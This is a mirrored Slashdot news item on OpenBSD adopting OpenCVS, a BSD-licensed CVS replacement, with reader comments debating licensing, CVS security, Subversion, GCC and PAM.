Slashdot Mirror

← Back to Stories (view on slashdot.org)

New BSD licensed CVS replacement for OpenBSD

Posted by Hemos on from the striking-out-on-its-own dept.

Jeferey Bakins writes "In an effort, by Jean-Francois Brousseau (jfb@openbsd.org), to rid the OpenBSD CVS tree of GPL'ed licensed code, OpenCVS is now officially part of the OpenBSD project. For more details, see the OpenCVS homepage; http://www.openbsd.org/opencvs/"

35 of 164 comments (clear)

  1. Re:That's great. . . but, um, why? by DrSkwid · · Score: 3, Insightful

    do we really need a CVS clone, where the only difference is the license?

    When the "we" is OpenBSD then the answer is yes.

    If you are not part of that "we" then the question is pointless.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  2. Re:The battle continues... by DrSkwid · · Score: 3, Insightful

    It is not a debate.

    "do what thou wilt" is the OpenBSD creed and the GPL is incompatible with that, what's your problem ?

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  3. Re:Why ? by Anonymous Coward · · Score: 2, Insightful

    One step at a time. Their use of CVS is deeply ingrained at the moment. Rewriting a well-understood tool is one thing. Designing and implementing a new source-control tool is a much larger, riskier task.

  4. Re:The battle continues... by ObsessiveMathsFreak · · Score: 4, Informative

    There's no silver bullet for licences either. The OpenBSDers want their system licenced under their rules, and more power to them. They have to remove all GPL code to do this beacuse the GPL is a more or less all or nothing free software licence.
    It's got nothing to do with evangelism, and all to do with practicality. You can't have bits and pieces of code GPLed and some not.

    Other licences are more flexible, but are less precise. I'll still be using the GPL for most of the code I write, because I want as many people as possible to use it, and be fully secure in doing so.

    --
    May the Maths Be with you!
  5. Re:The battle continues... by SirGeek · · Score: 3, Insightful
    There's no silver bullet for licences either. The OpenBSDers want their system licenced under their rules, and more power to them. They have to remove all GPL code to do this beacuse the GPL is a more or less all or nothing free software licence.

    Then is Open BSD going to stop using GCC ? I mean, GCC is GPL so it is using GPL software to create their system, right ?

    --
    UPS Sucks
  6. Subversion by Ded+Bob · · Score: 2, Interesting

    I was about to ask why they did not use Subversion, but I searched Google and found it uses software licensed under at least the LGPL (neon). Of course, they could have just edited Subversion to use another HTTP library like Curl or fetch (at least on FreeBSD). Maybe this has been in the planning stages for awhile.

  7. Re:That's great. . . but, um, why? by Christopher+Cashell · · Score: 2, Insightful

    When the "we" is OpenBSD then the answer is yes.

    So the goal is to reimplement every piece of GPLed code, is that correct?

    Let me know when they've finished with their GCC, Gnome, and KDE replacements. I'm looking forward to trying them out in 2012.

    If you are not part of that "we" then the question is pointless.

    Ah, that's helpful. All of a sudden, I'm reminded of why I've never cared much for OpenBSD.

    You guys enjoy your "new" CVS. I'm going back to actually getting work done using the tools available to me, including new technology like Subversion, darcs, and arch, as well as legacy software like CVS.

    Ideology is great, but once I reach the minimum required level of freedom (for my definition of free (which tends to closely parallel the DFSG)), I'm more interested in pragmatism and getting things done.

    --
    Topher
  8. Re:Why ? by Anonymous Coward · · Score: 5, Informative

    Read again...

    While CVS have been a functional tool in simple use, it has quite some drawbacks. Everyone who has been in the CVS guts (believe me, I have), knows that it is essentially write-only code.
    It is quite buggy, albeit the bugs are in corner-cases, not seldom noticed by people not using CVS massively. The CVS maintainers have been unwilling to accept bug reports (it may be a matter of opinion: "it's not a bug, it's a feature" has been heard). OpenBSD have had several local changes to cvs over the years.
    However, for the reason stated above (write-only code), we cannot trust the code enough. It has been one of the weakest spots of our system securitywise. CVS is also a network service, as such, it can put systems into potential risk, like
    all network services. We want to be able to put greater trust into this service. The people who thinks this is just license masturbation are wrong. It is nice to be able to free code, but the important thing is to secure it. GCC is not a network service. The GPL is not reason enough for us (yet .-) ) to rewrite it. Also, understandable code makes it easier to find a fix non-security bugs (but we like to look at all bugs, as potentially exploitable ones .-)).

    Niklas Hallqvist (I don't care enough to create a /. account)...

  9. More than the license. by NickHolland · · Score: 3, Informative

    There is a lot more to this than the license, though the license alone would be more than sufficient to justify doing it. While true, CVS is typically a development tool, that is HARDLY the limit of its abilities. What if you want to use a modified CVS to track configuration changes in a non-open source application? Oops! Can't do that with GPL'd CVS.

    CVS development has basicly stalled for quite some time. It has reached "good enough" state -- obviously, considering the number of projects that live off of it -- but there are still issues. Check the OpenBSD CVS Commit logs, search for "cvs sucks" and other such non-positive reviews of CVS's operation.

    There are also the relative primativeness of some aspects of CVS and its access rights. If you have access to the CVS repository, you can do anything with it... What if I'm not qualified to work in certain trees? What if I fat-finger an scp operation and upload a huge set of files into the CVS directory (no, I *don't* want to talk about it, but it's not a hypothetical concern! :). Then there is just plain simple security: nothing stops any person who has CVS access from being able to go in and directly edit the CVS repository files files OUTSIDE the CVS system, leading to untracked changes in the tree.

    And that's hardly all the complaints... If you think "license" is the only difference, you obviously didn't read the goals page very carefully (or believed the one line summary :-)

    1. Re:More than the license. by Anonymous Coward · · Score: 2, Insightful

      You should really look at CVS code before saying something like that... it's mostly impossible to fix anything down there.

      and there are also some good reasons not to switch to subversion.

      You say it's the same developers as CVS ? well, big surprise, they produced another half-finished piece of software.

      When what you care about is not extended functionality, but robustness and speed, cvs does not fit the bill. Neither does subversion.

    2. Re:More than the license. by setagllib · · Score: 2, Insightful

      There's more to it than that, though. BSDs run on a "least surprise" tactic, whereby major systems shouldn't change unless there is something REALLY wrong. The BSDs have all used CVS right from the early versions, and can still be fetched this way. If any of them were to drop CVS support for Subversion, for instance, users would have to adapt, and with the significant user base of BSD, that's quite a disruption.

      An honest question: Can Subversion import a CVS history and all branches and everything else relevant without any need for hand-hacking? Because when you want to migrate decades of source to a new system and keep it in working order, you don't want to have to mangle every file by hand. If Subversion does this then it's not entirely impractical to implement it - but since the biggest TRIVIAL (can be fixed without disrupting user base's expectations) problems in CVS can be fixed with a compatible re-write, it makes sense to do it that way. In this regard I congratulate OpenBSD on yet another brilliant and far overdue idea.

      --
      Sam ty sig.
  10. Article Summary Misleading by eviltypeguy · · Score: 5, Insightful

    I think the article summary is somewhat misleading, the front page of the project claims that OpenCVS is a result of the ongoing security vulnerabilities in the existing CVS project, which has grown stagnant:

    The OpenCVS project was started after discussions regarding the latest GNU CVS vulnerabilities that came out. Although CVS is widely used, its development has been mostly stagnant in the last years and many security issues have popped up, both in the implementation and in the mechanisms.

    Of course, I'm not going to be stupid enough to deny that there is a great probablity that another unwritten motivating factor was to use a non-GPL licensed piece of software. But, I think time has proven that while OpenBSD may not be a very useable distribution from a common desktop end-user standpoint, a lot of very good portable, secure code has come out of the project. Since I have to continue to run CVS servers for some of the projects I host I look forward to a secure portable CVS server that I can be more confident in.

    1. Re:Article Summary Misleading by evilviper · · Score: 2, Insightful
      while OpenBSD may not be a very useable distribution from a common desktop end-user standpoint

      I have no idea why people keep saying this. It's behind FreeBSD in the number of ports, but it still has all the major stuff available. Firefox, KDE, GNOME, etc. It's a bare Unix system, waiting to be made into anything you want it to be. How can it possibly be unusable for the same tasks that other Unix systems are usable for?

      Frankly, I find it to be a bit nicer than FreeBSD, and miles ahead of Linux, in that every device you plug-in will work immediately without problems, or will not work (because it's unsupported), rather than requiring you to load modules left and right, and change parameters, addresses, etc.
      --
      Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant
    2. Re:Article Summary Misleading by setagllib · · Score: 2, Interesting

      There's a small thing holding back Net and OpenBSD (I'm an advocate of both, this isn't trolling, just an observation) which is lack of real kernel preemption in favor of clean, simple code. While you do get the most out of your cycles this way (and it shows on lower spec machines), even on higher end machines even moderate load (in my experience, any compile job, even -j1) can make the user interface very unresponsive.

      My worst experience (possibly made worse by flaky hardware) of this is NetBSD 2 a couple of days ago, doing a pkg_chk -u round that made my entire day consist of 10-second lag after typing things before they appeared, and almost having to resort to elinks because Firefox couldn't do anything useful. On a DESKTOP system, traditionally an interactive system, this is a Very Bad Thing, since it reduces productivity if the system is under any other load.

      The irony is that the Net/OpenBSD approach results in typically better server/overall performance, where 'responsiveness' isn't an issue, and hence they really do make great servers. The way people say "Net and OpenBSD are still for servers" has its truth, but you won't stop me using (at least) NetBSD on a desktop instead of Linux just for the peace of mind.

      If there's a clean and simple way to improve responsiveness without significantly hurting performance, it should be implemented. Apparently a new thread scheduler would be enough, but even that is quite a task.

      --
      Sam ty sig.
  11. that's not the goddamn point by Geekboy(Wizard) · · Score: 4, Insightful

    the point of opencvs isn't to randomly replace GPL'd code, but to provide a different implementation, that is free of bugs and security issues. he's also working on other features to make cvs server better, and more secure.

    1. Re:that's not the goddamn point by 0racle · · Score: 2, Insightful

      That was the portable OpenSSH, not native OpenSSH. OpenSSH on OpenBSD has had one problem in the past few years because all the parts that it requires are secure and audited. Porting OpenSSH to other platforms requires them to link to other libraries that have not been written as securly and very often never audited, therefore its not a bug in OpenSSH so much as an unintended interaction because it is outside of its native environment.

      Rumor has it that you havne't had to update qmail or djbdns because those projects arn't exactly open to accepting bug reports or acknowledging the fact that there might be problems. I don't really know, I don't use either of them.

      --
      "I use a Mac because I'm just better than you are."
  12. Umm. No. by nenolod · · Score: 5, Insightful
    In an effort, by Jean-Francois Brousseau (jfb@openbsd.org), to rid the OpenBSD CVS tree of GPL'ed licensed code, OpenCVS is now officially part of the OpenBSD project. For more details, see the OpenCVS homepage; http://www.openbsd.org/opencvs/


    Umm. No. That's not what it's about at all. Lets correct the mistakes now, shall we?


    1) There was no OpenCVS until the OpenBSD project noticed some major security vulnerabilities posted to bugtraq in GNU CVS.


    2) The reason why OpenCVS was written was to provide a more secure client/server package than what the [now stagnant] GNU CVS project is currently providing. It has nothing to do with GPL vs BSD, infact the OpenBSD project is all about what RMS calls "free software".


    So basically the Slashdot editors posted a troll to the front page. Beautiful. :)

    1. Re:Umm. No. by Nimrangul · · Score: 2, Informative
      ipf wasn't GPL. It was a screwed up altered version of the BSD license; Darren Reed said that people couldn't go changing his ipf around (OpenBSD wanted to integrate it into their kernel) so the OpenBSD developers got a new packet filter.

      This is different, yes OpenBSD developers are working at removing GPL tools, but that does not mean they aren't replacing things of other less-free origin.

      Replacing the GnuCVS with OpenCVS isn't just over a license; it is more that as long as they're doing such a massive undertaking, they may as well go a little further and start fresh with a better license.

      --
      I'm sick of following my dreams - I'm just going to ask them where they're going and hook up with them later.
  13. Re:The battle continues... by Richard_at_work · · Score: 4, Insightful

    OpenBSD will stop using GCC when the Tendra Project has reached a satisfactory level of maturity. The OpenBSD team work under the premise that GPLed items are 'free enough for them' until a replacement can be found, just like Linus works under the same premise (see Bitkeeper).

  14. Re:That's great. . . but, um, why? by Anonymous Coward · · Score: 2, Insightful

    Ahem... cvs is a network service, gnome/kde are just desktop environments. OpenBSD is focussed on securing networks, yes? What makes you think that writting a more secure cvs is a waste of time? You talk about being pragmatic, but then you say everybody needs to start using subversion/darcs, so you must also think everyobody must ditch Windows OS and use Linux instead? Well guess what, people are going to keep using the tools they already know and have invested much time in, so maybe it's good if somebody can fix these tools.

  15. Re:That's great. . . but, um, why? by SillyNickName4me · · Score: 2, Informative

    > No, it is foremost a licensing issue and you are being disengenious saying otherwise.

    It is also a licensing issue.

    > You may call me impolite if you wish, but I am no more impolite as the insinuation that GPL'd CVS is somehow not FREE.

    It has a restriction. That restriction may serve a good purpose, but it is a restriction nonetheless and hence less free. If it is free enough or actually better or whatever is a matter of opinion. Calling it non free is a bit too much imho, but calling it not free enough, well, I tend to agree there, but I accept that others don't. How difficult is it for you to do what you said and accept someoen elses choice, even more when that someone is also prepared to do the work for it?

  16. Re:That's great. . . but, um, why? by Goo.cc · · Score: 4, Insightful

    You know, some people don't care for software that is emcumbered by the GPL and it is perfectly reasonable to write a replacement for such software. Just because you don't agree doesn't make it wrong.

  17. Re:That's great. . . but, um, why? by Richard_at_work · · Score: 4, Insightful

    The thing that amuses me about this post is that someone probably said this exact thing way back in the 1980s when GNU put together the project to write their own c compiler, unix replacement etc. When will people understand that some people view the GPL in the same manner as those GPL evangelists view commercial licenses - not free enough. Ideology is great, but you have to realise that everyones ideological views are the same - an opinion, and yours may not be the same as mine.

  18. Re:The battle continues... by evilviper · · Score: 2, Informative
    Then is Open BSD going to stop using GCC ?

    Eventually, yes.

    With the generally crappiness of GCC3, quite a few developers have been looking at Tendra. Licensing issues helped, but it's really how slow and buggy GCC3 has become that is driving people away.

    And before I get modded down as a pro-BSD troll, I'd like to say, you can hear the same complaints from plenty of Linux devs as well.
    --
    Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant
  19. Re:That's great. . . but, um, why? by archen · · Score: 5, Interesting

    Let me know when they've finished with their GCC, Gnome, and KDE replacements. I'm looking forward to trying them out in 2012.

    Judging by this commment I'm guessing you haven't used any BSD variant. The idea isn't to reimplement EVERY piece of GPLed code, only the stuff in the BASE SYSTEM. It's hard for many Linux users to make that distinction, but in BSD you have the base operating system (that's more than the kernel) and the add on software.

    Would you be happy using Linux if it had random things that had proprietary licences in it? Of course not. By the same token BSD is about being free via the BSD licence, it's really a snag when you have a mix of tools using BSD and GPL licences.

    I don't see stuff like GCC going away, but GCC isn't neccesary for a functioning system so it can be torn out if someone doesn't need it. Most of the base system has GNU utilities in odd spots (tar was recently replaced in FreeBSD for instance). When all of this is said and done you know that the base system is BSD, and the rest of the software is whatever you stack on top of it - no confusion as to what is where.

  20. Re:That's great. . . but, um, why? by M1FCJ · · Score: 2, Funny

    Please pay $0.05 to read the rest of the comment.

  21. Re:That's great. . . but, um, why? by flynn_nrg · · Score: 2, Informative

    CVS is a solid piece of software

    No, it isn't. Development is not that active anymore, the code is a total mess. Why? The networking portions are an afterthought, so there's a lot of duplicated code. It has tons of problems (ever tried renaming a file and keeping its history?). But it does the job, that's why a lot of people use it. The OpenBSD guys rely on CVS to do their job, but if it's an insecure piece of software then a replace is very welcomed.

    While I advocate OS, I settled on Perforce (free for 2 users/2 workspaces) for my home projects more than 2 years ago and never looked back.

    I say, kudos OpenBSD guys for doing this, it's a win-win situation.

  22. Why CVS? by chrysalis · · Score: 2

    I don't see the point.

    CVS was nice. But it has some very lousy limitations. Working with branches is a pain, and global revision numbers are really better than per-file revision numbers.

    Software like Arch or Subversion are not just "alternative". They really solve issues that CVS had and will always have because of its design.

    It doesn't mean that CVS doesn't work. It works. Even very well and even for very large projects.
    But people who tried alternatives usually never switched back to CVS.

    --
    {{.sig}}
  23. Re:The battle continues... by setagllib · · Score: 5, Interesting

    Here's where I step in with a favorite URL - http://kerneltrap.org/node/view/4126 - wherein Linus himself points out that GCC 3.x is a generally worse C compiler, with some advantages in C++ compiling being its only real saving throws.

    While I can't honestly say BSD projects haven't come under the same kind of problems (FreeBSD 5, for instance, which at least right now isn't a pretty sight), the tendancy is not to replace perfectly fine systems (like gcc 2.95's essential core, which was fast and light) with monstrosities (gcc 3.x). If something new is to be implemented, it has to be Right in design and in practice. If a BSD project wrote a compiler, it would be free, light, very UNIXy (functional, not kitschy), and few people would care because it's not GPL and anything non-GPL must be inferior, right? Some people...

    --
    Sam ty sig.
  24. Re:The battle continues... by dmiller · · Score: 2, Insightful

    gcc isn't perfect, but it isn't nearly as annoyingly bad as some of the other stuff we have to use. More importantly, it doesn't have to deal with untrusted network data (like cvs does).

    A BSD licensed cc would be nice, but an absolute crapload of work - especially renovating all those programs and ports that depend on gccisms (some of which are perfectly reasonable)

  25. Re:That's great. . . but, um, why? by Brandybuck · · Score: 2, Insightful

    do we really need a CVS clone, where the only difference is the license?

    If you would have bothered to read the article, instead of relying and the biased slashdot blurb, you would have realized that licensing isn't even offered as a reason. Really it's not!

    For your edification, here is the complete stated rational for OpenCVS: "The OpenCVS project was started after discussions regarding the latest GNU CVS vulnerabilities that came out. Although CVS is widely used, its development has been mostly stagnant in the last years and many security issues have popped up, both in the implementation and in the mechanisms."

    --
    Don't blame me, I didn't vote for either of them!
  26. Get your facts straight by dmiller · · Score: 3, Informative

    If the same class of people are doing opencvs then should we assume that the only safe environment to run opencvs will be OpenBSD, until otherwise proven?

    The "class of people" responsible for the bug in portable OpenSSH was me and nobody else - so please don't impugne the other OpenBSD developers.

    The fact that the 3.7.1 hole was not exploitable on OpenBSD was due to the fact that the bug related to PAM authentication, which OpenBSD doesn't use (for good reason).

    BTW, the bug was a logic error that could have been made in any language, so the standard Slashdolt cry of "C is insecure, use XXX" wouldn't have saved you.

  27. Reasons to hate PAM by dmiller · · Score: 3, Informative

    1) Poorly-specified - there are several ambuiguities in the spec, some with security implications if you get it wrong.

    2) Implementation differences between Linux-PAM, Sun PAM and OpenPAM - as a direct result of (1) above.

    3) Useless broken API which is completely blocking (i.e it prompts for an expects to receive the password/response in a single function call) - making is near-useless for a network application without major trickery

    4) Broken design that requires loadable modules which are encouraged by the API to pass opaque data behind the back of the calling application

    5) Total lack of separation between policy and mechanism - users are expected to configure policy by specifying which loadable modues are loaded using a silly and restrictive grammar.

    6) Zero standardisation for modules or their arguments. As a result, everyone implements things a little bit differently.

    Those are just the ones off the top of my head.

  28. Re:Two things that I don't get by OttoM · · Score: 2, Informative
    1st: OpenBSD is a developers' system. Having a source code control system is vital to that. Check the OpenBSD goals for details.

    2st: It is a question of priorities. The OpenBSD projecty does not want such an important tool (and a networking tool as well) for their development to be of questionable quality. Other posts provide more info why we think GNU CVS is a security hazard.

  29. Re:Two things that I don't get by setagllib · · Score: 3, Informative

    1: I explained this in another post, you must have missed it. The BSDs can have sources fetched via CVS (NetBSD recommends this way, rightly so), and having it in the base package makes this infinitely more convenient than having to install the gargantuan cvsup port or poking around for up-to-date-enough source tarballs once daily. Given the relatively small footprint of the CVS client, this convenience is well worth it.

    2: They don't have 'too much human resources', you're thinking of Linux. OpenBSD has clear goals and, yes, are motivated to achieve these goals. Security and freedom are goals; this project helps both. The BSDs don't "struggle hard" with manpower, they have as many developers as are needed; everything worth doing gets done. And having less developers is often better for coordination, which is why BSD code bases continue to be consistent and robust.

    --
    Sam ty sig.